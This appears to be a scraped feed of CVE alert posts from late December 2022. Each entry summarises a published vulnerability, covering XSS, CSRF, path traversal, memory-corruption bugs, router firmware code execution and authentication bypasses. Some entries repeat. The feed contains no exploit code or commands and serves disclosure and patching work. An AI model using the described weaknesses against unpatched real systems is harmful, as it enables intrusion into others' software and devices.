|
| 2022-12-29 19:29:57 |
🚨 CVE-2022-25931All versions of package easy-static-server are vulnerable to Directory Traversal due to missing input sanitization and sandboxes being employed to the req.url user input that is passed to the server code.🎖@cveNotify |
|
| 2022-12-29 19:29:56 |
🚨 CVE-2022-47578** DISPUTED ** An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by booting into Safe Mode. This allows a file to be exchanged outside the laptop/system. Safe Mode can be launched by any user (even without admin rights). Data exfiltration can occur, and also malware might be introduced onto the system. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2022-12-29 19:29:55 |
🚨 CVE-2022-25904All versions of package safe-eval are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the Object.prototype.Consolidate when using the function safeEval. This is because the function uses vm variable, leading an attacker to modify properties of the Object.prototype.🎖@cveNotify |
|
| 2022-12-29 19:29:54 |
🚨 CVE-2022-44636The Samsung TV (2021 and 2022 model) smart remote control allows attackers to enable microphone access via Bluetooth spoofing when a user is activating remote control by pressing a button. This is fixed in xxx72510, E9172511 for 2021 models, xxxA1000, 4x2A0200 for 2022 models.🎖@cveNotify |
|
| 2022-12-29 19:29:50 |
🚨 CVE-2022-25940All versions of package lite-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.🎖@cveNotify |
|
| 2022-12-29 19:29:49 |
🚨 CVE-2022-4640A vulnerability has been found in Mingsoft MCMS 5.2.9 and classified as problematic. Affected by this vulnerability is the function save of the component Article Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216499.🎖@cveNotify |
|
| 2022-12-29 19:29:48 |
🚨 CVE-2021-4272A vulnerability classified as problematic has been found in studygolang. This affects an unknown part of the file static/js/topics.js. The manipulation of the argument contentHtml leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 0fb30f9640bd5fa0cae58922eac6c00bb1a94391. It is recommended to apply a patch to fix this issue. The identifier VDB-216477 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-29 19:29:44 |
🚨 CVE-2020-36618A vulnerability classified as critical has been found in Furqan node-whois. Affected is an unknown function of the file index.coffee. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to launch the attack remotely. The name of the patch is 46ccc2aee8d063c7b6b4dee2c2834113b7286076. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216252.🎖@cveNotify |
|
| 2022-12-29 19:29:43 |
🚨 CVE-2022-45942A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.🎖@cveNotify |
|
| 2022-12-29 19:29:42 |
🚨 CVE-2022-4844Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-29 19:29:38 |
🚨 CVE-2022-4846Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-29 19:29:37 |
🚨 CVE-2022-4848Improper Verification of Source of a Communication Channel in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-29 19:29:36 |
🚨 CVE-2022-4849Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-29 17:29:58 |
🚨 CVE-2021-36631Untrusted search path vulnerability in Baidunetdisk Version 7.4.3 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.🎖@cveNotify |
|
| 2022-12-29 17:29:57 |
🚨 CVE-2022-2841A vulnerability was found in CrowdStrike Falcon 6.31.14505.0/6.42.15610/6.44.15806. It has been classified as problematic. Affected is an unknown function of the component Uninstallation Handler. The manipulation leads to missing authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 6.40.15409, 6.42.15611 and 6.44.15807 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-206880.🎖@cveNotify |
|
| 2022-12-29 17:29:56 |
🚨 CVE-2022-4643A vulnerability was found in docconv up to 1.2.0. It has been declared as critical. This vulnerability affects the function ConvertPDFImages of the file pdf_ocr.go. The manipulation of the argument path leads to os command injection. The attack can be initiated remotely. Upgrading to version 1.2.1 is able to address this issue. The name of the patch is b19021ade3d0b71c89d35cb00eb9e589a121faa5. It is recommended to upgrade the affected component. VDB-216502 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-29 17:29:55 |
🚨 CVE-2022-4642A vulnerability was found in tatoeba2. It has been classified as problematic. This affects an unknown part of the component Profile Name Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version prod_2022-10-30 is able to address this issue. The name of the patch is 91110777fc8ddf1b4a2cf4e66e67db69b9700361. It is recommended to upgrade the affected component. The identifier VDB-216501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-29 17:29:54 |
🚨 CVE-2022-4646Cross-Site Request Forgery (CSRF) in GitHub repository ikus060/rdiffweb prior to 2.5.4.🎖@cveNotify |
|
| 2022-12-29 17:29:53 |
🚨 CVE-2022-47210The default console presented to users over telnet (when enabled) is restricted to a subset of commands. Commands issued at this console, however, appear to be fed directly into a system call or other similar function. This allows any authenticated user to execute arbitrary commands on the device.🎖@cveNotify |
|
| 2022-12-29 17:29:52 |
🚨 CVE-2022-4644Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.4.🎖@cveNotify |
|
| 2022-12-29 17:29:48 |
🚨 CVE-2018-25058A vulnerability classified as problematic has been found in Twitter-Post-Fetcher up to 17.x. This affects an unknown part of the file js/twitterFetcher.js of the component Link Target Handler. The manipulation leads to use of web link to untrusted target with window.opener access. It is possible to initiate the attack remotely. Upgrading to version 18.0.0 is able to address this issue. The name of the patch is 7d281c6fb5acbc29a2cad295262c1f0c19ca56f3. It is recommended to upgrade the affected component. The identifier VDB-217017 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-29 17:29:47 |
🚨 CVE-2021-4295A vulnerability classified as problematic was found in ONC code-validator-api up to 1.0.30. This vulnerability affects the function vocabularyValidationConfigurations of the file src/main/java/org/sitenv/vocabularies/configuration/CodeValidatorApiConfiguration.java of the component XML Handler. The manipulation leads to xml external entity reference. Upgrading to version 1.0.31 is able to address this issue. The name of the patch is fbd8ea121755a2d3d116b13f235bc8b61d8449af. It is recommended to upgrade the affected component. VDB-217018 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-29 17:29:46 |
🚨 CVE-2021-4296A vulnerability, which was classified as problematic, has been found in w3c Unicorn. This issue affects the function ValidatorNuMessage of the file src/org/w3c/unicorn/response/impl/ValidatorNuMessage.java. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 51f75c31f7fc33859a9a571311c67ae4e95d9c68. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217019.🎖@cveNotify |
|
| 2022-12-29 17:29:45 |
🚨 CVE-2022-4778StreamX applications from versions 6.02.01 to 6.04.34 are affected by a path traversal vulnerability that allows authenticated users to get unauthorized access to files on the server's filesystem. StreamX applications using StreamView HTML component with the public web server feature activated are affected.🎖@cveNotify |
|
| 2022-12-29 17:29:44 |
🚨 CVE-2022-4779StreamX applications from versions 6.02.01 to 6.04.34 are affected by a logic bug that allows to bypass the implemented authentication scheme. StreamX applications using StreamView HTML component with the public web server feature activated are affected.🎖@cveNotify |
|
| 2022-12-28 18:30:17 |
🚨 CVE-2022-3541A vulnerability classified as critical has been found in Linux Kernel. This affects the function spl2sw_nvmem_get_mac_address of the file drivers/net/ethernet/sunplus/spl2sw_driver.c of the component BPF. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211041 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 18:30:16 |
🚨 CVE-2016-2338An exploitable heap overflow vulnerability exists in the Psych::Emitter start_document function of Ruby. In Psych::Emitter start_document function heap buffer "head" allocation is made based on tags array length. Specially constructed object passed as element of tags array can increase this array size after mentioned allocation and cause heap overflow.🎖@cveNotify |
|
| 2022-12-28 18:30:15 |
🚨 CVE-2022-38177By spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources.🎖@cveNotify |
|
| 2022-12-28 18:30:14 |
🚨 CVE-2022-38178By spoofing the target resolver with responses that have a malformed EdDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources.🎖@cveNotify |
|
| 2022-12-28 18:30:11 |
🚨 CVE-2022-3202A NULL pointer dereference flaw in diFree in fs/jfs/inode.c in Journaled File System (JFS)in the Linux kernel. This could allow a local attacker to crash the system or leak kernel internal information.🎖@cveNotify |
|
| 2022-12-28 18:30:10 |
🚨 CVE-2022-1199A flaw was found in the Linux kernel. This flaw allows an attacker to crash the Linux kernel by simulating amateur radio from the user space, resulting in a null-ptr-deref vulnerability and a use-after-free vulnerability.🎖@cveNotify |
|
| 2022-12-28 18:30:09 |
🚨 CVE-2021-4204An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information.🎖@cveNotify |
|
| 2022-12-28 18:30:08 |
🚨 CVE-2022-1056Out-of-bounds Read error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 46dc8fcd.🎖@cveNotify |
|
| 2022-12-28 18:30:04 |
🚨 CVE-2022-0891A heap buffer overflow in ExtractImageSection function in tiffcrop.c in libtiff library Version 4.3.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact🎖@cveNotify |
|
| 2022-12-28 18:30:03 |
🚨 CVE-2022-46910An issue in the firmware update process of TP-Link TL-WA901ND V1 up to v3.11.2 and TL-WA901N V2 up to v3.12.16 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-28 18:30:02 |
🚨 CVE-2022-46912An issue in the firmware update process of TP-Link TL-WR841N / TL-WA841ND V7 3.13.9 and earlier allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-28 18:29:59 |
🚨 CVE-2022-46914An issue in the firmware update process of TP-LINK TL-WA801N / TL-WA801ND V1 v3.12.16 and earlier allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-28 18:29:58 |
🚨 CVE-2022-41794A heap based buffer overflow vulnerability exists in the PSD thumbnail resource parsing code of OpenImageIO 2.3.19.0. A specially-crafted PSD file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 18:29:57 |
🚨 CVE-2022-43603A denial of service vulnerability exists in the ZfileOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 18:29:56 |
🚨 CVE-2022-43592An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 16:29:54 |
🚨 CVE-2022-4803Improper Access Control in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:53 |
🚨 CVE-2022-4805Incorrect Use of Privileged APIs in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:52 |
🚨 CVE-2022-4806Improper Access Control in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:49 |
🚨 CVE-2022-4807Improper Access Control in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:48 |
🚨 CVE-2022-4808Improper Privilege Management in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:47 |
🚨 CVE-2022-4810Improper Access Control in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:46 |
🚨 CVE-2022-4811Improper Authorization in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:43 |
🚨 CVE-2022-4812Comparison of Object References Instead of Object Contents in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:42 |
🚨 CVE-2022-4814Improper Access Control in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-28 16:29:41 |
🚨 CVE-2022-43858IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to access the file system and download files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks by modifying a parameter thereby gaining access to their files through this interface. IBM X-Force ID: 239303.🎖@cveNotify |
|
| 2022-12-28 16:29:37 |
🚨 CVE-2022-22456IBM Security Verify Governance, Identity Manager 10.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 225004.🎖@cveNotify |
|
| 2022-12-28 16:29:36 |
🚨 CVE-2022-22458IBM Security Verify Governance, Identity Manager 10.0.1 stores user credentials in plain clear text which can be read by a remote authenticated user. IBM X-Force ID: 225009.🎖@cveNotify |
|
| 2022-12-28 16:29:35 |
🚨 CVE-2022-3922The Broken Link Checker WordPress plugin before 1.11.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2022-12-28 14:29:44 |
🚨 CVE-2018-25052A vulnerability has been found in Catalyst-Plugin-Session up to 0.40 and classified as problematic. This vulnerability affects the function _load_sessionid of the file lib/Catalyst/Plugin/Session.pm of the component Session ID Handler. The manipulation of the argument sid leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.41 is able to address this issue. The name of the patch is 88d1b599e1163761c9bd53bec53ba078f13e09d4. It is recommended to upgrade the affected component. VDB-216958 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 14:29:39 |
🚨 CVE-2018-25053A vulnerability was found in moappi Json2html up to 1.1.x and classified as problematic. This issue affects some unknown processing of the file json2html.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.2.0 is able to address this issue. The name of the patch is 2d3d24d971b19a8ed1fb823596300b9835d55801. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216959.🎖@cveNotify |
|
| 2022-12-28 14:29:38 |
🚨 CVE-2018-25054A vulnerability was found in shred cilla. It has been classified as problematic. Affected is an unknown function of the file cilla-xample/src/main/webapp/WEB-INF/jsp/view/search.jsp of the component Search Handler. The manipulation of the argument details leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is d345e6bc7798bd717a583ec7f545ca387819d5c7. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216960.🎖@cveNotify |
|
| 2022-12-28 14:29:37 |
🚨 CVE-2018-25056A vulnerability, which was classified as problematic, was found in yolapi. Affected is the function render_description of the file yolapi/pypi/metadata.py. The manipulation of the argument text leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is a0fe129055a99f429133a5c40cb13b44611ff796. It is recommended to apply a patch to fix this issue. VDB-216966 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 14:29:36 |
🚨 CVE-2022-3922The Broken Link Checker WordPress plugin before 1.11.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2022-12-28 12:29:57 |
🚨 CVE-2022-3347DNSSEC validation is not performed correctly. An attacker can cause this package to report successful validation for invalid, attacker-controlled records. Root DNSSEC public keys are not validated, permitting an attacker to present a self-signed root key and delegation chain.🎖@cveNotify |
|
| 2022-12-28 12:29:56 |
🚨 CVE-2019-25091A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without 'httponly' flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 12:29:55 |
🚨 CVE-2020-36635A vulnerability was found in OpenMRS Appointment Scheduling Module up to 1.12.x. It has been classified as problematic. This affects the function validateFieldName of the file api/src/main/java/org/openmrs/module/appointmentscheduling/validator/AppointmentTypeValidator.java. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.13.0 is able to address this issue. The name of the patch is 34213c3f6ea22df427573076fb62744694f601d8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216915.🎖@cveNotify |
|
| 2022-12-28 12:29:54 |
🚨 CVE-2020-36636A vulnerability classified as problematic has been found in OpenMRS Admin UI Module up to 1.4.x. Affected is the function sendErrorMessage of the file omod/src/main/java/org/openmrs/module/adminui/page/controller/systemadmin/accounts/AccountPageController.java of the component Account Setup Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 702fbfdac7c4418f23bb5f6452482b4a88020061. It is recommended to upgrade the affected component. VDB-216918 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 12:29:50 |
🚨 CVE-2021-4291A vulnerability was found in OpenMRS Admin UI Module up to 1.5.x. It has been declared as problematic. This vulnerability affects unknown code of the file omod/src/main/webapp/pages/metadata/locations/location.gsp. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.6.0 is able to address this issue. The name of the patch is a7eefb5f69f6c50a3bffcb138bb8ea57cb41a9b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216916.🎖@cveNotify |
|
| 2022-12-28 12:29:49 |
🚨 CVE-2021-4292A vulnerability was found in OpenMRS Admin UI Module up to 1.4.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/metadata/privileges/privilege.gsp of the component Manage Privilege Page. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 4f8565425b7c74128dec9ca46dfbb9a3c1c24911. It is recommended to upgrade the affected component. The identifier VDB-216917 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 12:29:48 |
🚨 CVE-2022-4772A vulnerability was found in Widoco and classified as critical. Affected by this issue is the function unZipIt of the file src/main/java/widoco/WidocoUtils.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is f2279b76827f32190adfa9bd5229b7d5a147fa92. It is recommended to apply a patch to fix this issue. VDB-216914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 12:29:44 |
🚨 CVE-2022-41966XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.🎖@cveNotify |
|
| 2022-12-28 12:29:43 |
🚨 CVE-2022-4773** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in cloudsync. Affected by this vulnerability is the function getItem of the file src/main/java/cloudsync/connector/LocalFilesystemConnector.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is 3ad796833398af257c28e0ebeade68518e0e612a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216919. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-28 12:29:42 |
🚨 CVE-2020-36567Unsanitized input in the default logger in github.com/gin-gonic/gin before v1.6.0 allows remote attackers to inject arbitrary log lines.🎖@cveNotify |
|
| 2022-12-28 12:29:38 |
🚨 CVE-2015-10004Token validation methods are susceptible to a timing side-channel during HMAC comparison. With a large enough number of requests over a low latency connection, an attacker may use this to determine the expected HMAC.🎖@cveNotify |
|
| 2022-12-28 12:29:37 |
🚨 CVE-2016-15005CSRF tokens are generated using math/rand, which is not a cryptographically secure rander number generation, making predicting their values relatively trivial and allowing an attacker to bypass CSRF protections which relatively few requests.🎖@cveNotify |
|
| 2022-12-28 12:29:36 |
🚨 CVE-2017-20146Usage of the CORS handler may apply improper CORS headers, allowing the requester to explicitly control the value of the Access-Control-Allow-Origin header, which bypasses the expected behavior of the Same Origin Policy.🎖@cveNotify |
|
| 2022-12-28 06:29:43 |
🚨 CVE-2021-33644An attacker who submits a crafted tar file with size in header struct being 0 may be able to trigger an calling of malloc(0) for a variable gnu_longname, causing an out-of-bounds read.🎖@cveNotify |
|
| 2022-12-28 06:29:42 |
🚨 CVE-2021-33643An attacker who submits a crafted tar file with size in header struct being 0 may be able to trigger an calling of malloc(0) for a variable gnu_longlink, causing an out-of-bounds read.🎖@cveNotify |
|
| 2022-12-28 06:29:41 |
🚨 CVE-2021-33645The th_read() function doesn’t free a variable t->th_buf.gnu_longlink after allocating memory, which may cause a memory leak.🎖@cveNotify |
|
| 2022-12-28 06:29:37 |
🚨 CVE-2020-36563XML Digital Signatures generated and validated using this package use SHA-1, which may allow an attacker to craft inputs which cause hash collisions depending on their control over the input.🎖@cveNotify |
|
| 2022-12-28 06:29:36 |
🚨 CVE-2022-3347DNSSEC validation is not performed correctly. An attacker can cause this package to report successful validation for invalid, attacker-controlled records. Root DNSSEC public keys are not validated, permitting an attacker to present a self-signed root key and delegation chain.🎖@cveNotify |
|
| 2022-12-28 06:29:35 |
🚨 CVE-2022-23555authentik is an open-source Identity Provider focused on flexibility and versatility. Versions prior to 2022.11.4 and 2022.10.4 are vulnerable to Improper Authentication. Token reuse in invitation URLs leads to access control bypass via the use of a different enrollment flow than in the one provided. The vulnerability allows an attacker that knows different invitation flows names (e.g. `enrollment-invitation-test` and `enrollment-invitation-admin`) via either different invite links or via brute forcing to signup via a single invitation url for any valid invite link received (it can even be a url for a third flow as long as it's a valid invite) as the token used in the `Invitations` section of the Admin interface does NOT change when a different `enrollment flow` is selected via the interface and it is NOT bound to the selected flow, so it will be valid for any flow when used. This issue is patched in authentik 2022.11.4,2022.10.4 and 2022.12.0. Only configurations that use invitations and have multiple enrollment flows with invitation stages that grant different permissions are affected. The default configuration is not vulnerable, and neither are configurations with a single enrollment flow. As a workaround, fixed data can be added to invitations which can be checked in the flow to deny requests. Alternatively, an identifier with high entropy (like a UUID) can be used as flow slug, mitigating the attack vector by exponentially decreasing the possibility of discovering other flows.🎖@cveNotify |
|
| 2022-12-28 02:29:55 |
🚨 CVE-2022-23544MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.🎖@cveNotify |
|
| 2022-12-28 02:29:54 |
🚨 CVE-2022-41966XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.🎖@cveNotify |
|
| 2022-12-28 02:29:53 |
🚨 CVE-2022-41967Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML `SNAPSHOT` versions are being resolved, this vulnerability may be avoided by not trying to resolve `SNAPSHOT` versions.🎖@cveNotify |
|
| 2022-12-28 02:29:52 |
🚨 CVE-2022-4773** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in cloudsync. Affected by this vulnerability is the function getItem of the file src/main/java/cloudsync/connector/LocalFilesystemConnector.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is 3ad796833398af257c28e0ebeade68518e0e612a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216919. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-28 02:29:51 |
🚨 CVE-2021-40403An information disclosure vulnerability exists in the pick-and-place rotation parsing functionality of Gerbv 2.7.0 and dev (commit b5f1eacd), and Gerbv forked 2.8.0. A specially-crafted pick-and-place file can exploit the missing initialization of a structure to leak memory contents. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:50 |
🚨 CVE-2021-40401A use-after-free vulnerability exists in the RS-274X aperture definition tokenization functionality of Gerbv 2.7.0 and dev (commit b5f1eacd) and Gerbv forked 2.7.1. A specially-crafted gerber file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:48 |
🚨 CVE-2021-40393An out-of-bounds write vulnerability exists in the RS-274X aperture macro variables handling functionality of Gerbv 2.7.0 and dev (commit b5f1eacd) and the forked version of Gerbv (commit 71493260). A specially-crafted gerber file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:47 |
🚨 CVE-2021-40394An out-of-bounds write vulnerability exists in the RS-274X aperture macro variables handling functionality of Gerbv 2.7.0 and dev (commit b5f1eacd) and the forked version of Gerbv (commit 71493260). A specially-crafted gerber file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:46 |
🚨 CVE-2019-25091A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without 'httponly' flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:45 |
🚨 CVE-2020-36635A vulnerability was found in OpenMRS Appointment Scheduling Module up to 1.12.x. It has been classified as problematic. This affects the function validateFieldName of the file api/src/main/java/org/openmrs/module/appointmentscheduling/validator/AppointmentTypeValidator.java. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.13.0 is able to address this issue. The name of the patch is 34213c3f6ea22df427573076fb62744694f601d8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216915.🎖@cveNotify |
|
| 2022-12-28 02:29:44 |
🚨 CVE-2020-36636A vulnerability classified as problematic has been found in OpenMRS Admin UI Module up to 1.4.x. Affected is the function sendErrorMessage of the file omod/src/main/java/org/openmrs/module/adminui/page/controller/systemadmin/accounts/AccountPageController.java of the component Account Setup Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 702fbfdac7c4418f23bb5f6452482b4a88020061. It is recommended to upgrade the affected component. VDB-216918 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-28 02:29:40 |
🚨 CVE-2021-4290A vulnerability was found in DHBW Fallstudie. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file app/config/passport.js of the component Login. The manipulation of the argument id/email leads to sql injection. The name of the patch is 5c13c6a972ef4c07c5f35b417916e0598af9e123. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216907.🎖@cveNotify |
|
| 2022-12-28 02:29:39 |
🚨 CVE-2021-4291A vulnerability was found in OpenMRS Admin UI Module up to 1.5.x. It has been declared as problematic. This vulnerability affects unknown code of the file omod/src/main/webapp/pages/metadata/locations/location.gsp. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.6.0 is able to address this issue. The name of the patch is a7eefb5f69f6c50a3bffcb138bb8ea57cb41a9b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216916.🎖@cveNotify |
|
| 2022-12-28 02:29:38 |
